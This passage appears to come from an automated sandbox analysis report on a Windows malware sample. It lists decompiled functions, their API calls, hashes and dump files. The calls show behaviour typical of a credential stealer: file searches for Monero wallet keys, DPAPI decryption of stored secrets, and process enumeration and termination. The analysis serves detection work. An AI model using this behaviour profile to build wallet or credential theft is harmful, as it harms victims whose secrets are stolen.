                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006D0C32), ref: 006BDF5E
                                  • StrCmpCA.SHLWAPI(?,006D15C0), ref: 006BDFAE
                                  • StrCmpCA.SHLWAPI(?,006D15C4), ref: 006BDFC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BE4E0
                                  • FindClose.KERNEL32(000000FF), ref: 006BE4F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: 9b6aeba8b4afa71ae6bae4a21323f76eaae3caf2b0a6fe5cb921a34d94f36ec0
                                  • Instruction ID: a61a10cb8384d1a370d4d1313d840a688b1fec673c533aeb80bf6b559c736903
                                  • Opcode Fuzzy Hash: 9b6aeba8b4afa71ae6bae4a21323f76eaae3caf2b0a6fe5cb921a34d94f36ec0
                                  • Instruction Fuzzy Hash: D0F1A87192411C9ACB55EBA0DCA5FFEB33AEF54304F4045DEA10A62191EE306F89CF69
                                  Function 006BDB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006D15A8,006D0BAF), ref: 006BDBEB
                                  • StrCmpCA.SHLWAPI(?,006D15AC), ref: 006BDC33
                                  • StrCmpCA.SHLWAPI(?,006D15B0), ref: 006BDC49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BDECC
                                  • FindClose.KERNEL32(000000FF), ref: 006BDEDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 9bf67983dc5ae99c01244b1a2f5252e3ff66096fe0af852d32182e4c8afdec95
                                  • Instruction ID: b5a8f97c5990a1acdc65e4d9eeef591f67f04625e1a99250fc485b5031988294
                                  • Opcode Fuzzy Hash: 9bf67983dc5ae99c01244b1a2f5252e3ff66096fe0af852d32182e4c8afdec95
                                  • Instruction Fuzzy Hash: 919123B2A101089BCB54FBF0ED96EFD737EAF84344F00465CB9065A141EA34DB488B96
                                  Function 006C98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C9905
                                  • Process32First.KERNEL32(006B9FDE,00000128), ref: 006C9919
                                  • Process32Next.KERNEL32(006B9FDE,00000128), ref: 006C992E
                                  • StrCmpCA.SHLWAPI(?,006B9FDE), ref: 006C9943
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C995C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 006C997A
                                  • CloseHandle.KERNEL32(00000000), ref: 006C9987
                                  • CloseHandle.KERNEL32(006B9FDE), ref: 006C9993
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 52ab00df065c0b4a6143ae6283e37c06fc2f57a601975261b8876823eec06633
                                  • Instruction ID: 3b4d237d16271e1f22b0b5384a481d0936547617ffb9d56a7fec376e59a27b59
                                  • Opcode Fuzzy Hash: 52ab00df065c0b4a6143ae6283e37c06fc2f57a601975261b8876823eec06633
                                  • Instruction Fuzzy Hash: 35110A75A18208EBCB24DFE0DC8CBEDB7B9AB48700F10458CF519A6340DB749A84DFA0
                                  Function 006C7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,006D05B7), ref: 006C7D71
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 006C7D89
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 006C7D9D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006C7DF2
                                  • LocalFree.KERNEL32(00000000), ref: 006C7EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 87ed25615845999895139070afc0a5921571bd8bfa95eca81d9a81d45262ccfc
                                  • Instruction ID: f51527934d9abd69a606ca01c57c352f40a6b57e5dd0ab978050fdbba269959b
                                  • Opcode Fuzzy Hash: 87ed25615845999895139070afc0a5921571bd8bfa95eca81d9a81d45262ccfc
                                  • Instruction Fuzzy Hash: F0414971944218ABCB64DB94DC99FFEB376EB48704F2041DDE10A62280DB346F84CF65
                                  Function 006BE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006D0D79), ref: 006BE5A2
                                  • StrCmpCA.SHLWAPI(?,006D15F0), ref: 006BE5F2
                                  • StrCmpCA.SHLWAPI(?,006D15F4), ref: 006BE608
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BECDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: eb96d1a63cf529cc3f63aca9a81da73c742b0c076d6b2f9689dd67905e44f3ab
                                  • Instruction ID: a85d6a687b29d79ca4125c85959e443c84d36827be697512236c0adc3b22751b
                                  • Opcode Fuzzy Hash: eb96d1a63cf529cc3f63aca9a81da73c742b0c076d6b2f9689dd67905e44f3ab
                                  • Instruction Fuzzy Hash: CD12DA72A1011C9ACB54FBA0DDA6FFD733BEF54304F4045ADA50A56191EE30AF88CB5A
                                  Function 006BA210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA23F
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,006B4F3E,00000000,?), ref: 006BA251
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA27A
                                  • LocalFree.KERNEL32(?,?,?,?,006B4F3E,00000000,?), ref: 006BA28F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: >Ok
                                  • API String ID: 4291131564-2083912338
                                  • Opcode ID: b161df25a2f8fe5ebef6cde7d7f748734d60accdcd35d5335b4cba22bec4e06b
                                  • Instruction ID: d62138ee31a639ccce5c0b2365f173bb95c32ba02c31ec21e595a36d0a034ea3
                                  • Opcode Fuzzy Hash: b161df25a2f8fe5ebef6cde7d7f748734d60accdcd35d5335b4cba22bec4e06b
                                  • Instruction Fuzzy Hash: 4F11A4B4244308AFEB11CFA4CC95FAA77B5EB89B10F208458FD159B390C772EA41DB50
                                  Function 00B098D7 Relevance: 7.9, Strings: 5, Instructions: 1650COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1*~$Q&s$R$?_$vzGo$~=;
                                  • API String ID: 0-3660083655
                                  • Opcode ID: 49e51dd082c1e6dad75621cf8faecc0b5f41d128fcc818d7013ff33face973bf
                                  • Instruction ID: 9ad31d12f96108055af03f3d5b2623f96bf8504ba8546789649ae9070e12d996
                                  • Opcode Fuzzy Hash: 49e51dd082c1e6dad75621cf8faecc0b5f41d128fcc818d7013ff33face973bf
                                  • Instruction Fuzzy Hash: 75B236F360C2049FE304AE29EC8567AFBE5EF94720F16893DE6C5C3744EA3598058697
                                  Function 0071F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: \u$\u${${$}$}
                                  • API String ID: 0-582841131
                                  • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction ID: 7fb682d395658e57b50d4c103f391b572adc2a9b04e69da36331e4cf68d32160
                                  • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction Fuzzy Hash: C4416012D19BD5C5CB058B7844A02EEBFB22FD6210F6D82DAC49D5F3C2C778514AD3A5
                                  Function 006BC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 006BC971
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 006BC97C
                                  • lstrcat.KERNEL32(?,006D0B47), ref: 006BCA43
                                  • lstrcat.KERNEL32(?,006D0B4B), ref: 006BCA57
                                  • lstrcat.KERNEL32(?,006D0B4E), ref: 006BCA78
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 9ecca3ac6197387ffd6203e0a9189dbb6aa084a8001d7eae60007e3f6d39dd72
                                  • Instruction ID: 88899bbd7e5cd5e301b16c880465bf34ed7fe218d7c99ff8b167ce02f90576f2
                                  • Opcode Fuzzy Hash: 9ecca3ac6197387ffd6203e0a9189dbb6aa084a8001d7eae60007e3f6d39dd72
                                  • Instruction Fuzzy Hash: 364151B4D1821EABDB10CF94DD89BFEF7B9AB48304F1041A9E509A6380D7749B84DF91
                                  Function 006B72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006B72AD
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006B72B4
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006B72E1
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006B7304
                                  • LocalFree.KERNEL32(?), ref: 006B730E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
